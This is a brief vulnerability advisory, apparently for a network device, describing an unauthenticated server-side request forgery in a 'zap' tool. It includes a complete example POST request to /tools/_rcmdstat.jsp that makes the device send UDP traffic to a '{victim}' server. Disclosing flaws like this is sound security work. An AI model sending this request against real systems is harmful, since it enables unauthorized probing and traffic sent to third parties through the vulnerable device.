SSRF vulnerability in zap, caused by insufficient input validation.
zap
executable is reachable without authentication and can be used to send tcp/udp requests to both internal and external IP addresses.
SSRF POST request example
POST /tools/_rcmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
Content-Length: 230
<ajax-request action='docmd' xcmd='wc' updater='system.1568118269965.3208' comp='zapd'>
<xcmd cmd='wc' comp='zapd' wcid=1 client='192.168.0.1' tool='zap-up' zap-type='udp' server='{victim}' syspmtu=65500 />
</ajax-request>